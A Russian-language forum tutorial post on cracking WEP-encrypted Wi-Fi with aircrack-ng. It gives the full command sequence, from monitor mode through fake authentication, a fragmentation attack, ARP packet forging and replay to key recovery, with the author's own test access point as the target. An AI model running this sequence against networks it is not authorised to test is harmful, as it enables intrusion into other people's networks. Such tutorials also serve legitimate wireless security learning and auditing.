Показать сообщение отдельно
Старый 29.01.2012, 20:51      #1 (ссылка на пост)
levinkv
Активный пользователь
 
Аватар для levinkv
 
Регистрация: 23.01.2012
Сообщений: 54
levinkv скоро придёт к известности
Информация

По умолчанию Взлом Wi-Fi сети (WEP)

Всем привет!

Начинается цикл статей по анализу и взлому wi-fi сетей. Постараюсь по возможности рассказывать, как можно подробно. Останавливаясь на интересных моментах. Если вы по каким то причинам вы не знаете теорию беспроводных сетей, то рекомендую прочитать статью “Введение в беспроводные сети“.

Итак, начну с самого начала, чтобы некоторые вопросы отпали сами собой.

Перевести интерфейс в monitor mode

Для того, чтобы просканировать доступные wi-fi сети, нужно сначала перевести интерфейс wi-fi клиента в режим монитора (monitor mode). Для начала посмотрим, какие беспроводные интерфейсы имеются.

Код:
airmon-ng

Click the image to open in full size.

У меня доступны два интерфейса: wlan0 и wlan1. wlan0 это обычный и ничем не примечательный wi-fi клиент, который в данной ситуации не нужен. wlan1 – специализированный беспроводной клиент (ALFA AWUS036H), который как раз нужно перевести в режим монитора. Делается это следующим способом:

Код:
airmon-ng start wlan1

Click the image to open in full size.

Как видно из листинга, wlan1 создает виртуальный интерфейс mon0, который находится в режиме монитора (monitor mode).

Теперь можем сканировать wi-fi сети. Опять напомню, что выдаются только те AP, в зоне действия которых находимся.

Для справки: можно конечно увеличить область приема. Для этого необходимо приобрести узконаправленную антенну с большим коэффициентом усиления, например от 15 до 20 dbi. В wi-fi клиенте, который использую я, коэффициент усиления антенны составляет 5 dbi. В стандартных wi-fi клиентах и точках доступа (AP) используется ненаправленные антенны (с круговой диаграммой направленности) и коэффициентом усиления от 2 до 3 dbi.

Код:
airodump-ng mon0

Click the image to open in full size.

Из листинга видим, какие точки доступа находятся в радиусе действия. Но так как закон нарушать очень не хорошо, я буду проводить взлом wi-fi на своей тестовой точке доступа (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17).

Настройка интерфейса завершена. Теперь займемся непосредственно взломом wi-fi.

Fragmentation attack

Итак, осталось только настроить интерфейс mon0 на конкретную точку доступа (AP). Если этого не сделать, mon0 будет и дальше мониторить все каналы. Следующая команда переводит интерфейс на тестовую wi-fi сеть hub-lex-AP.

Код:
airodump-ng -c 1 -w wep --bssid BC:AE:C5:71:D3:17 mon0
-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа

Click the image to open in full size.

Первое, что необходимо, это подключиться к точке доступа. Следующая команда (fake_authentication) позволяет это сделать.

Код:
aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0
-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем

Click the image to open in full size.

Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.

Click the image to open in full size.

Далее будем использовать Fragmentation attack. Fragmentation attack позволяет получить ключевой поток длины 1500 байт, что позволит затем отсылать произвольные пакеты в сеть.

Код:
aireplay-ng -5 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0
-5 – fragmentation attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента

Click the image to open in full size.

Теперь воспользуемся packetforge-ng, чтобы создать шифрованный пакет.

Код:
packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y fragment-1210-103644.xor -w arp
-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение PRGA из файла
-w – записать пакет в pcap-файл

Click the image to open in full size.

Далее используем Interactive packet replay (интерактивная генерация пакетов).

Код:
aireplay-ng -2 -r arp mon0
-2 – interactive replay attack
-r – имя pcap-файла

Осталось подождать пока соберется достаточное количество Data-пакетов.

Click the image to open in full size.

Data-пакеты собраны. Требуется расшифровать их.

Click the image to open in full size.

Код:
aircrack-ng -a 1 -0 wep-01.cap
-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет

Click the image to open in full size.

Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.

Источник: www.levinkv.ru
levinkv вне форума   Ответить с цитированием
Эти 2 пользователя(ей) сказали Спасибо levinkv за это полезное сообщение:
evgen (15.06.2013), lemurean (05.12.2014)
 
Время генерации страницы 0.07888 секунды с 15 запросами